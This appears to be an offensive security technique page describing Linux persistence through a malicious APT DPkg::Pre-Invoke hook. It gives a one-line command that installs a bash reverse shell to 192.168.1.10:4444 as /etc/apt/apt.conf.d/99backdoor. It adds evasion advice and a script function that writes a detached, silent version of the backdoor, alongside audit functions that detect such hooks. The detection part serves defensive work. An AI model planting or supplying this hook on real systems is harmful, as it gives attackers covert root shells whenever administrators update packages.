redttps

Persistence with apt (Linux)

Description

This technique abuses the APT package manager by dropping a hook into its configuration. Any file placed in /etc/apt/apt.conf.d/ is parsed by apt (in lexical order, so a name starting with 99 is read last and overrides nothing), and the DPkg::Pre-Invoke option defines a shell command that apt runs, via /bin/sh -c and as root, immediately before every dpkg invocation: install, upgrade, remove or purge. Note that a plain apt update does not call dpkg and therefore does not fire this hook. By embedding a reverse shell or other payload in the hook, the attacker gets a root callback every time an administrator performs routine package maintenance. It is stealthy because it blends into normal system administration: no cron entry, no service, and no change to the package itself.

Steps

  1. Create a malicious configuration file in /etc/apt/apt.conf.d/ that defines a DPkg::Pre-Invoke hook. The payload here is a bash reverse shell to 192.168.1.10:4444, but it could be any command or binary:

     echo 'DPkg::Pre-Invoke { "bash -c '\''bash -i >& /dev/tcp/192.168.1.10/4444 0>&1'\''"; };' | sudo tee /etc/apt/apt.conf.d/99backdoor

  2. Wait for an administrator to run any apt operation that invokes dpkg (for example apt install or apt upgrade); the hook fires before dpkg starts.

  Caveat: as written, the shell runs in the foreground, so apt blocks until the shell exits, and if the connection is refused the non-zero exit makes apt abort with "Problem executing scripts DPkg::Pre-Invoke", which is exactly the kind of error an administrator investigates. Backgrounding the payload and forcing a zero exit status avoids both problems.
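As an added worked example (not part of the original page), the two sides of the technique as shell functions: one that writes the hook in a form that neither blocks nor fails apt, and one that audits a configuration directory for such hooks. The configurable directory argument, the default file name 99backdoor, the callback address 192.168.1.10:4444, and the use of setsid to detach the payload are assumptions made so the functions can be exercised against a scratch directory without root; the audit patterns are the hook option names apt itself defines (DPkg::Pre-Invoke, DPkg::Post-Invoke, DPkg::Pre-Install-Pkgs, APT::Update::Pre-Invoke and Post-Invoke).

```shell
#!/usr/bin/env bash
# Added example, not the original page's command: write an apt.conf.d
# DPkg::Pre-Invoke hook, and audit a config directory for such hooks.
# The directory is a parameter (assumption) so this can be tested in a
# scratch directory; on a real host it would be /etc/apt/apt.conf.d.

# Write the hook. apt runs the value with "sh -c" as root before every dpkg
# invocation. The callback is detached with setsid and backgrounded, and
# "true" is the last command, so apt never blocks on the shell and never
# sees a non-zero exit ("Problem executing scripts DPkg::Pre-Invoke").
# Arguments: conf_dir callback_host callback_port [file_name]
write_apt_hook() {
    local conf_dir=$1 host=$2 port=$3 name=${4:-99backdoor}
    local target="$conf_dir/$name"
    # The apt value is double-quoted, so the inner bash -c body must use
    # single quotes; the '\'' sequences below emit a literal single quote.
    printf 'DPkg::Pre-Invoke { "setsid bash -c '\''bash -i >& /dev/tcp/%s/%s 0>&1'\'' >/dev/null 2>&1 & true"; };\n' \
        "$host" "$port" > "$target"
    echo "$target"
}

# Audit: print every file:line in a config directory that defines an apt or
# dpkg invocation hook. Returns 1 if none is found, so it can gate a
# hardening script. Legitimate hooks exist (debconf, packagekit, etc.), so
# each hit still needs a human look at the command it runs.
# Argument: conf_dir
find_apt_hooks() {
    local conf_dir=$1
    grep -rniE 'Pre-Invoke|Post-Invoke|Pre-Install-Pkgs' "$conf_dir" 2>/dev/null || return 1
}

# Merged view on a live host: what apt will actually execute, including
# hooks set in /etc/apt/apt.conf rather than the .d directory. Requires apt.
dump_live_apt_hooks() {
    apt-config dump 2>/dev/null | grep -iE 'Pre-Invoke|Post-Invoke|Pre-Install-Pkgs'
}

# Optional CLI use:  ./apt_hooks.sh audit [/etc/apt/apt.conf.d]
if [ "${1:-}" = "audit" ]; then
    find_apt_hooks "${2:-/etc/apt/apt.conf.d}"
fi
```

On a stock Debian or Ubuntu host the audit typically lists entries such as debconf's DPkg::Pre-Install-Pkgs hook, so the useful signal is a hook whose command opens a network connection, spawns a shell, or lives in a file name not owned by any package (dpkg -S /etc/apt/apt.conf.d/99backdoor will report no owner). Comparing the .d directory with the apt-config dump output also catches a hook hidden in /etc/apt/apt.conf itself.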

    Reference: Created by Luis Rivera